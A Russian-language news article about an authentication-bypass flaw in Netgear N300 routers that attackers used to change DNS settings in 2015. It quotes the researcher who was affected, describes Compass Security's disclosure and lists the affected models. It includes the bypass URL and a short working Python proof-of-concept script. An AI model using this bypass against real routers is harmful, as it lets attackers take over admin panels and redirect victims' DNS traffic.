Серьезную уязвимость в роутерах Netgear уже эксплуатируют хакеры

Серьезную уязвимость в роутерах Netgear уже эксплуатируют хакеры

В роутерах компании Netgear обнаружена серьезная уязвимость, позволяющая изменить настройки DNS, минуя аутентификацию. Эксплоит опубликован, багу подвержено более 5000 устройств, но компания еще не выпустила исправление.

Эксперт в области информационной безопасности Джо Гайрон (Joe Giron) рассказал BBC, что в роутерах Netgear наличествует серьезный баг.  Гайрон имел неудовольствие убедиться в этом лично, так как 28 сентября 2015 года он обнаружил, что взломали его собственный роутер. В частности, хакеры изменили DNS на роутере Гайрона на собственный вредоносный адрес.

«Обычно я использую DNS Google, но в настройках оказалось прописано что-то совершенно иное. Два или три дня весь мой DNS-трафик проходил через непонятный сервер», — рассказывает Гайрон.

Оказалось, что данный баг ранее обнаружили специалисты шведской фирмы Compass Security, они же недавно раскрыли информацию о бреши и опубликовали в открытом доступе эксплоит, выждав положенное время. То есть в Netgear уже знают о проблеме, просто компания не успела подготовить патч в срок.

Согласно опубликованной Compass Security информации, эксплуатировать уязвимость и проникнуть в админку очень легко, это можно сделать как через браузер, так и написав простой эксплоит. Когда пользователь запрашивает веб-интерфейс роутера, инициируется процесс базовой HTTP-аутентификации. Если пользователь не знает логина и пароля, ему покажут файл 401_access_denied.htm. В этот момент атакующий может несколько раз использовать http://<ROUTER-IP>/BRS_netgear_success.html в URL, в результате чего попадает в админку, минуя авторизацию. Python-скрипт:

import os
import urllib2
import time
import sys


try:
first = urllib2.urlopen(«http://» + sys.argv[1])
print «No password protection!»
except:
print «Password protection detected!»
print «Executing exploit…»
for i in range(0,3):
time.sleep(1)
urllib2.urlopen(«http://» + sys.argv[1] + «/BRS_netgear_success.html»)

second = urllib2.urlopen(«http://» + sys.argv[1])
if second.getcode() == 200:
print «Bypass successfull. Now use your browser to have a look at the admin interface.»

Уязвимости подвержены прошивки N300_1.1.0.31_1.0.1.img и N300-1.1.0.28_1.0.1.img, то есть следующие девайсы:

-JNR1010v2
-JWNR2000v5
-JWNR2010v5
-WNR614
-WNR618
-WNR1000v4
-WNR2020
-WNR2020v2

Специалисты Netgear существование бага признают, называют его «очень серьезным» и обещают представить патч 14 октября 2015 года.

Источник: xakep.ru